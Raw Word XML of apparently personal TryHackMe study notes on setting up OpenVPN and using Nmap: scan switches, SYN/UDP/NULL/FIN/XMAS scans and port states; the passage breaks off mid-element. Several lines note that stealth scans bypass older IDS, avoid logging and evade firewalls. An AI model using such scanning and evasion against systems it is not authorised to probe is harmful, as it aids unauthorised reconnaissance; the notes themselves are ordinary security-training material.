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F32D" w14:textId="3B6B91DF" w:rsidR="00DD24CB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tryhackme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28C7FBD1" w14:textId="1C89486E" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Setup </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>openvpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AC57A9" w14:textId="31DC73CF" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ongoing in Terminal – no final message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71539926" w14:textId="5BCBE3D2" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Connection tested via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tryhackme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EFD8B7" w14:textId="2EDF6CEA" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Begin with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C620760" w14:textId="27BBB3E5" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2A080" w14:textId="1A93A160" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="00F306FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Perform appropriate enumeration of network map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3431EF91" w14:textId="06E5BC0E" w:rsidR="004A65FB" w:rsidRPr="0084205E" w:rsidRDefault="004A65FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crucial point to begin attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C6B60" w14:textId="793860EC" w:rsidR="004A65FB" w:rsidRPr="0084205E" w:rsidRDefault="004A65FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>1024 well-known ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB40CA" w14:textId="142B3DE2" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Switches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35807CF1" w14:textId="5FF5967F" w:rsidR="004A65FB" w:rsidRPr="0084205E" w:rsidRDefault="004A65FB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = Syn Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12177B55" w14:textId="05CAE61C" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = UDP scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA70F3" w14:textId="4566D285" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-O = OS scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A718FA" w14:textId="16FEF9F6" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = service versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC80D56" w14:textId="03D3B6AC" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-v = verbosity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1392CA" w14:textId="694E3E10" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = increased verbosity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFE03F" w14:textId="606E6959" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>oA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = output saved to three major file types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC6150" w14:textId="1722C8D1" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = normal format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7EBAAA" w14:textId="37AA096C" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>oG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – greppable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113848D5" w14:textId="6B19D86B" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-A = aggressive scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59906B1E" w14:textId="61E39662" w:rsidR="00563192" w:rsidRPr="0084205E" w:rsidRDefault="00563192" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">-p- </w:t>
      </w:r>
      <w:r w:rsidR="004F60CF" w:rsidRPr="0084205E">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004F60CF" w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F60CF" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>= scan all ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2847D1" w14:textId="5A225A16" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>--script = active a script from the map scripting library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E6E637" w14:textId="7D5F1D34" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>--script=&lt;category&gt; = active all scripts from a given category</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F041BC" w14:textId="407A52B9" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Scan Type Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC4496B" w14:textId="0B8AA2BB" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TCP connect scans = -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1724FB50" w14:textId="6075994D" w:rsidR="00F306FB" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SYN half-open scans = -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A87143D" w14:textId="524D7B2A" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="009B6CD4" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>UDP scans = -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="017ADE1B" w14:textId="09170863" w:rsidR="009B6CD4" w:rsidRPr="0084205E" w:rsidRDefault="004F60CF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RFC 793 = define TCP protocol behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A97137" w14:textId="157761E2" w:rsidR="004F60CF" w:rsidRPr="0084205E" w:rsidRDefault="004F60CF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RST flag for closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2E894" w14:textId="68EAA3AD" w:rsidR="004F60CF" w:rsidRPr="0084205E" w:rsidRDefault="004F60CF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ACK = open port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6EBE1" w14:textId="480E7BE1" w:rsidR="004F60CF" w:rsidRPr="0084205E" w:rsidRDefault="004F60CF" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filtered = firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB32F44" w14:textId="2CA77E53" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SYN Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5F35F" w14:textId="1AC6552B" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – used to scan TCP port-range of a target through half-open/stealth scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE1B14" w14:textId="07F72D3E" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Replies to SYNACK with RST packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F5F2B" w14:textId="1D183D08" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bypass old IDS looking for full 3way TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EA1168" w14:textId="5A3F13BC" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Defeats logs as they aren’t logged until connection is completed via 3way TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E4E80B" w14:textId="3D06D183" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782438F6" w14:textId="5991C091" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>However, require root privilege for use and can bring down unstable systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479570D6" w14:textId="2EA75A64" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Nmap under root uses SYN by default, user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmaps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use traditional TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654369AB" w14:textId="437C73F9" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0042623F" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>UDP Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1879FA71" w14:textId="60630287" w:rsidR="0042623F" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packets sent to UDP ports should receive no response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164DC98" w14:textId="382CD8CF" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Closed leads to response with ICMP packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86462E" w14:textId="34C5B2CB" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Takes much longer, typically deployed with a specific common UDP port range to limit total scan time – top 20 usually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F68D656" w14:textId="0CA2B5EF" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>NULL, FIN, XMAS scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592A54A9" w14:textId="7F0DA9B3" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stealthier than SYN but less commonly used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A344245" w14:textId="19AE858A" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Only identify ports as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>open|filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, closed, filtered as no response for open (Like UDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5745C471" w14:textId="3FD5B911" w:rsidR="00D75040" w:rsidRPr="0084205E" w:rsidRDefault="00D75040" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Used for firewall evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC45CC" w14:textId="2D2266FE" w:rsidR="0014441D" w:rsidRPr="0084205E" w:rsidRDefault="0014441D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
